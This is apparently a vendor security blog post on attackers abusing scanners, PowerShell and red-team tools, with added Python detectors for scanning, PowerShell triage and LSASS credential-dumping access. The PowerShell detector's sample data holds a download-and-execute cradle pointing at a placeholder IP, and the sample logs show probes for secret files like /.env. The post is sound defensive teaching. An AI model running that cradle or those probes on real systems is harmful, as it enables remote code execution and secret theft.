Don't underestimate your adversary. Some security practitioners dismiss everyday hackers and threat actors as typical "script kiddies." That is true in some cases, but probably not in most. Enter the danger of not knowing your enemy:
“If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.” (Sun Tzu)
There's actually a decent chance that the people working within today's newsmaking threat groups are seasoned system administrators, developers, or security researchers. It takes serious skill to stay ahead of law enforcement and literally dozens of security companies. Defenders have to fend off a multitude of attacks; the adversary only needs to hit the target once. Using commercial technology and standard system tools ups the ante for defenders. It's one thing to flag known-malicious software running in your network; it's another altogether when the tool is PowerShell, for example, running under a valid user account. The burden falls entirely on the network defenders to figure out whether that PowerShell use is legitimate, and whether that user has the privileges or the need to make those processes occur.
When threat actors "live off the land," they leverage what's already on a system or readily available in the marketplace. It's essential to understand that even the scariest threats make use of what's available: they're skilled, and it becomes hard to tell who's in the estate when everyone is using the same tools. Living off the land is a hallmark of highly proficient threats: they work well not only with their own bespoke tooling but also with what's on the market. In this blog, I'll talk about some of the ways adversaries try to get in, and what they do with system tools and off-the-shelf software once they're inside.
If you have network infrastructure exposed to the internet at large, you've seen the marks of scanners in your network logs. To use the analogy of a locked building, scanners knock on doors and lightly try the door handles while noting which windows have their curtains open or drawn. Scans are used by friend and foe alike to find vulnerabilities, so it's important to understand the roles they play: adversaries use them in bulk to find vulnerable infrastructure to attack, while defenders use them to stay compliant and patched.
Scanners range from tools that perform basic network mapping, such as Nmap, to more in-depth vulnerability scanners such as Nessus or OpenVAS, which assess what they find with more context. There are also scanners aimed at specific web applications. Some are paid; others are free. Alongside scans from the good guys and the bad guys, researchers and security companies conduct passive and active scans for analysis and reporting. Finally, in one more layer of noise, your own security vendor may conduct regular scans for security, compliance, or penetration testing.
The topic of scanning shows up on various dark web forums and marketplaces. In one recent forum post, for example, a longtime contributor made an exhaustive list of every type of scanner and its capabilities, numbering into the dozens. Dark web sites are also full of posts around scanning, including offers of scanning services, friendly how-to articles, and ratings for various tools.
So, what can we as security practitioners do about scanning? Fixes sound simple in the abstract but can be difficult in practice. For starters, it means keeping anything externally exposed patched. It may also take extra work to ensure web servers and applications are not returning stack traces or default version banners, which help attackers pick and craft exploits.
On a practical note, an organization should audit and close off unneeded services and ports to the world while hardening what needs to be public. Blocking known-bad IP ranges and ISPs can help reduce the noise from scanning; however, without a lot of context about specific infrastructure or actor methods (which are ever-changing), attributing a scan is difficult. This is especially true for uncovering malicious scans, since a rented botnet can run the scanning at a distributed, large, and relatively anonymous scale.
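To make the "marks of scanners in network logs" concrete, here is a small detector that runs over web server access logs. It is an added example, not code from the original post or from Digital Shadows: it flags a source either by a scanner user-agent string (a short assumed list; the Nmap Scripting Engine string is Nmap's real default) or by the behavioural signature of many distinct paths and a high 404 ratio in a short window. The log lines are constructed for the example, in combined log format, with documentation-range addresses.

```python
"""Flag likely scanners in web server access logs (added example with constructed sample data)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx combined log format (assumed layout): ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# User-Agent fragments of common scanners (assumed list; extend from your own telemetry).
SCANNER_UA = ("nmap scripting engine", "nessus", "openvas", "masscan", "nikto", "sqlmap")

# Constructed sample: 203.0.113.7 probes many paths and mostly gets 404s with a browser UA,
# 198.51.100.5 is an ordinary visitor, 192.0.2.9 makes two requests but declares Nmap.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:02 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:03 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:04 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:05 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:06 +0000] "GET /.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:07 +0000] "GET /.git/config HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:08 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:09 +0000] "GET /manager/html HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.7 - - [10/Jun/2021:12:00:10 +0000] "GET /backup.zip HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
198.51.100.5 - - [10/Jun/2021:12:01:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"
198.51.100.5 - - [10/Jun/2021:12:01:10 +0000] "GET /static/app.css HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"
198.51.100.5 - - [10/Jun/2021:12:01:30 +0000] "GET /static/app.js HTTP/1.1" 200 2200 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"
192.0.2.9 - - [10/Jun/2021:12:02:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.0.2.9 - - [10/Jun/2021:12:02:01 +0000] "GET /nmaplowercheck1623326520 HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
"""


def parse(lines):
    """Yield parsed records; silently skip lines that do not match the expected format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
            rec["status"] = int(rec["status"])
            yield rec


def find_scanners(lines, min_paths=8, min_404_ratio=0.5, max_window_s=60):
    """Return {ip: [reasons]} for sources that look like scanners."""
    by_ip = defaultdict(list)
    for rec in parse(lines):
        by_ip[rec["ip"]].append(rec)

    verdicts = {}
    for ip, recs in by_ip.items():
        reasons = []
        uas = {r["ua"].lower() for r in recs}
        hits = [s for s in SCANNER_UA if any(s in ua for ua in uas)]
        if hits:
            reasons.append(f"scanner user-agent: {hits[0]}")
        paths = {r["path"] for r in recs}
        not_found = sum(1 for r in recs if r["status"] == 404)
        span = (max(r["ts"] for r in recs) - min(r["ts"] for r in recs)).total_seconds()
        # Behavioural rule: many distinct paths, mostly 404s, inside a short window.
        if len(paths) >= min_paths and not_found / len(recs) >= min_404_ratio and span <= max_window_s:
            reasons.append(f"{len(paths)} distinct paths, {not_found}/{len(recs)} 404s in {span:.0f}s")
        if reasons:
            verdicts[ip] = reasons
    return verdicts


if __name__ == "__main__":
    for ip, why in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", "; ".join(why))
```

The per-source thresholds are the weak point, exactly as the paragraph above warns: a rented botnet that spreads the same path list across hundreds of addresses stays under `min_paths` for every one of them, so in practice this rule is paired with an aggregate view (unique probing sources per hour, or the same unusual path requested from many sources) rather than used alone.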
Once an adversary is inside the network, we move to living off the land. As mentioned before, an adversary who ends up inside the castle walls is probably familiar with system tools, and malicious use of Linux bash scripts or Windows PowerShell is not uncommon. There are dozens of ways to "hack in." In a low-and-slow attack, an adversary might enter and watch the environment for a time to learn what's normal, find their location within the network, test connectivity, or learn about the user profile they now own. If configurations don't allow things like downloads or executing files, a piece of custom tooling might be the perfect solution, but it runs the risk of being caught quickly by security tools or settings.
Searching on just "bash" alone on the MITRE ATT&CK site reveals dozens of instances of bash use tied to known APT groups, malware, and various enterprise and mobile techniques. PowerShell is no different and is highly favored for all of its uses. It appeared in at least four of the eleven CISA alerts from the first half of 2021 and shows no sign of slowing down, especially when combined with other threat tactics.
Other system tools can help with establishing a presence within a network. Examples of this behavior may look like:
In addition, users with elevated privileges can dump process memory to recover logged-on credentials, or use those privileges to create new user accounts to stay inside, much as the community observed during the "Great Exchange grab" of 2021.
Threat hunting can often discover these system behaviors, but it takes time. In its simplest form, threat hunting is looking for an incident without an actual incident having been declared. A threat hunter working through logs to discover these anomalies needs to know what normal looks like in a given environment. Hunting also requires knowledge of how system tools and processes interact, and of what is legitimate versus an actual malicious event. Administrators can restrict who may run PowerShell with administrative rights and constrain what it can do, but the controls aren't perfect. Taken together with other indicators and questions, however, the clues are sometimes there in plain sight.
Sometimes the system tools aren't enough, but other legitimate tools can do the job instead. These tools are often already present within an organization for various needs, and threat actors have adopted them for the same ease of use. While this is by no means a complete listing, these are some of the names that surface most often in security articles and product demonstrations. They also feature heavily in MITRE ATT&CK's analysis of known adversary tactics and techniques.
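The hunting problem the last few paragraphs describe, deciding whether a PowerShell launch under a valid account is legitimate, comes down to two questions: what did the command actually do, and is this user and parent process a place where PowerShell normally appears? The script below is an added example, not the post's own code, that triages constructed process-creation events. It decodes `-EncodedCommand` blobs (PowerShell's encoding is base64 over UTF-16LE), matches a handful of well-known suspicious switches and download-cradle patterns, and weighs each event against an assumed baseline of expected PowerShell users and parent processes. The account names, hostnames, baseline sets, and the encoded payload are all constructed for the example.

```python
"""Triage PowerShell command lines against a per-user/parent baseline (added example, constructed data)."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str
    cmdline: str


# Assumed baseline of where interactive PowerShell is expected; build yours from observed telemetry.
EXPECTED_PS_USERS = {r"CORP\svc_sccm", r"CORP\admin.jane"}
EXPECTED_PARENTS = {"explorer.exe", "code.exe", "ccmexec.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

SUSPICIOUS = {
    "download cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass policy": re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I),
    "no profile": re.compile(r"-nop\b|-noprofile", re.I),
}


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(ev):
    """Score one event: 2 points per content finding, 1 per deviation from the baseline."""
    findings, context = [], []
    decoded = decode_encoded_command(ev.cmdline)
    # Search the decoded script plus the command line with the base64 blob removed,
    # so random base64 text cannot accidentally match a pattern.
    text = ENC_RE.sub("-EncodedCommand <blob>", ev.cmdline)
    if decoded is not None:
        findings.append("encoded command")
        text += " " + decoded
    for name, rx in SUSPICIOUS.items():
        if rx.search(text):
            findings.append(name)
    if ev.user not in EXPECTED_PS_USERS:
        context.append(f"user {ev.user} not in PowerShell baseline")
    if ev.parent.lower() not in EXPECTED_PARENTS:
        context.append(f"unusual parent {ev.parent}")
    return {"score": 2 * len(findings) + len(context), "findings": findings,
            "context": context, "decoded": decoded}


def rank(events):
    """Return (triage result, event) pairs, most suspicious first."""
    return sorted(((triage(e), e) for e in events), key=lambda t: t[0]["score"], reverse=True)


# Constructed sample events. The first carries a download cradle hidden in an encoded command,
# launched from an Office process by an ordinary user; the third is an admin script that
# bypasses execution policy but otherwise looks routine; the second is plainly benign.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/a.ps1')"
ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
EVENTS = [
    ProcEvent("WS-042", r"CORP\jdoe", "winword.exe", f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ProcEvent("WS-017", r"CORP\admin.jane", "explorer.exe", "powershell.exe Get-Service -Name Spooler"),
    ProcEvent("SRV-DB1", r"CORP\svc_backup", "cmd.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for result, ev in rank(EVENTS):
        print(ev.host, result["score"], result["findings"], result["context"])
```

The middle-scoring event is the interesting one for a hunter: nothing in the command line is malicious on its face, but the account and parent are outside the baseline, which is precisely the "does this user have the need to make this happen" question the paragraph above raises. In a real estate the baseline sets come from weeks of your own 4688 or Sysmon process-creation telemetry, not from a hand-written list.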
One of the most familiar tools for these jobs is Mimikatz, which has been around for well over a decade. Originally written as a proof of concept showing how Windows kept credentials recoverable in memory, it has grown in capability: extracting plaintext passwords, password hashes, and Kerberos tickets from memory, and performing pass-the-hash and pass-the-ticket attacks. While it is flagged by many security tools, it remains free, available, and updated. Given that its signature is well known, if Mimikatz pops up on a network it's a bad sign, whether the result of bad practice or adversary activity. There are also variants such as MimiPenguin with similar capabilities on Linux machines.
Probably the next most notorious of these is Metasploit, initially developed for penetration testing. The framework was designed to be adaptable while staying open source, which means legitimate red teams use it, along with the adversaries they emulate. What made it so popular and accessible is that it is essentially a framework into which exploits can be loaded once someone finds a vulnerability, with scanning and auxiliary modules alongside. It runs across a variety of operating systems and is modular across variants. This is another one whose signature is well known, so if you're not undergoing a pen test and see Metasploit active, it's probably not for something good.
Finally, the tool that has surged in adversary use recently is Cobalt Strike. Listed as the #2 threat in Red Canary's 2021 Threat Detection Report, it's another tool designed for red teaming. For red team purposes, it shows network defenders how to defend against a fast-moving attacker using some of the latest tactics, where an adversary may need only minutes or hours to achieve objectives. It has evolved into a Swiss Army knife of offensive capabilities that mirrors, and in places bests, what other red team tools can do. It does "fun" things like process injection and can launch its payload, known as Beacon, via several Windows mechanisms such as PowerShell or COM, which makes it useful to adversaries. It gained a lot of popularity with ransomware this year, and several known attacks included Cobalt Strike indicators, in addition to historical examples with APTs and other criminal actors.
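Because Mimikatz and its imitators recover credentials by reading the memory of the LSASS process, the behaviour is more durable to hunt for than the binary's signature. The following is an added example, not code from the original post: it reads Sysmon Event ID 10 (ProcessAccess) records, decodes the `GrantedAccess` mask (PROCESS_VM_READ is 0x0010, PROCESS_VM_WRITE 0x0020, PROCESS_CREATE_THREAD 0x0002 in the Win32 access-rights bits), and flags read or injection-capable handles to lsass.exe from sources outside an assumed allowlist, with extra weight when the call trace passes through unbacked memory. The record format is a constructed key=value flattening of the Sysmon XML fields, and the baseline list of legitimate LSASS readers is an assumption to be replaced by your own observations.

```python
"""Hunt for credential-dumping style access to LSASS in Sysmon Event ID 10 (added example, constructed data)."""
from dataclasses import dataclass

# Win32 process access rights relevant to reading or tampering with another process.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Source images that legitimately open lsass.exe with read access on a typical host.
# Assumed baseline: build yours from observed telemetry rather than copying this list.
BASELINE_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


@dataclass
class ProcessAccess:
    source_image: str
    target_image: str
    granted_access: int
    call_trace: str


def parse_event(line):
    """Parse 'Key=Value;Key=Value' records (constructed flattening of the Sysmon event fields).

    ';' is used as the field separator because Sysmon's CallTrace uses '|' between frames.
    """
    fields = dict(kv.split("=", 1) for kv in line.strip().split(";"))
    return ProcessAccess(
        fields["SourceImage"],
        fields["TargetImage"],
        int(fields["GrantedAccess"], 16),
        fields.get("CallTrace", ""),
    )


def assess(ev):
    """Return a verdict dict for interesting LSASS access, or None if the event is not of interest."""
    if not ev.target_image.lower().endswith(r"\lsass.exe"):
        return None
    reasons = []
    if ev.granted_access & PROCESS_VM_READ:
        reasons.append("VM_READ on lsass (memory can be read)")
    if ev.granted_access & (PROCESS_VM_WRITE | PROCESS_CREATE_THREAD):
        reasons.append("write/thread rights on lsass (injection-capable)")
    if "UNKNOWN" in ev.call_trace:
        reasons.append("call trace includes unbacked memory (UNKNOWN)")
    if not reasons:
        return None
    verdict = "baseline" if ev.source_image.lower() in BASELINE_SOURCES else "suspicious"
    return {"source": ev.source_image, "verdict": verdict, "reasons": reasons}


def hunt(lines):
    """Run assess() over raw records and keep only the events worth looking at."""
    results = []
    for line in lines:
        r = assess(parse_event(line))
        if r is not None:
            results.append(r)
    return results


# Constructed sample records: a baseline reader, a renamed binary in a user's Temp directory
# reading LSASS via unbacked code, a benign limited-information query, and a non-LSASS target.
SAMPLE_EVENTS = [
    r"SourceImage=C:\Windows\System32\csrss.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1010;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d3e4|C:\Windows\System32\KERNELBASE.dll+2ad7e",
    r"SourceImage=C:\Users\jdoe\AppData\Local\Temp\svchost.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1010;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d3e4|UNKNOWN(00000000026E2A60)",
    r"SourceImage=C:\Windows\System32\svchost.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1000;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d3e4",
    r"SourceImage=C:\Windows\System32\Taskmgr.exe;TargetImage=C:\Windows\System32\svchost.exe;GrantedAccess=0x1fffff;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d3e4",
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["verdict"], r["source"], "->", "; ".join(r["reasons"]))
```

Keeping "baseline" hits in the output rather than dropping them is deliberate: an attacker who names their dumper `csrss.exe` in the right directory, or injects into a real baseline process, shows up there, so the baseline bucket still deserves a periodic review of image hashes and parent processes rather than being treated as noise.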
One of the most straightforward and most interesting infographics in threat intelligence (next to the intelligence cycle, of course) is the Pyramid of Pain. The premise is simple: if you can deny an adversary their tactics, techniques, and procedures (TTPs), you've caused them a great deal of pain, far more than denying your typical static indicators of compromise. As David Bianco writes, since TTPs are actual behavior rather than tools, countering them forces the adversary into a great deal of rethinking and retooling. In practice, if the defense is good, rather than rethinking and retooling they'll probably move on to an easier target.
This is why it's crucial to understand how effectively adversaries use system tools and commercial software. Adversaries know these are cost-effective and require very little investment, especially when bringing other groups into their operations: there's less to teach and learn when the tools are common and available. Also, why burn a perfectly good zero-day on a problem that an open-source red team tool can solve, or spend money developing malware when other options are freely available? They're also banking on organizations being soft targets that rely on the lower levels of the Pyramid of Pain. Static indicators have their uses, but the actual behaviors, tools, and process artifacts are what cause adversaries the most pain.
At Digital Shadows (now ReliaQuest), we can help you in your quest to deny adversaries a foothold in your environment. Our intelligence comes from monitoring the dark web, catching chatter on specific campaigns and threat actors, and sometimes seeing what they're using against the community. For example, we see when you have exposed data that adversaries can use, or when they're registering domains to spoof your customers or abuse your intellectual property. If you're curious where you stand with your risk management, take SearchLight (now ReliaQuest's GreyMatter Digital Risk Protection) for a free demo. We're happy to help you understand the risk you carry and provide some solutions to help mitigate it.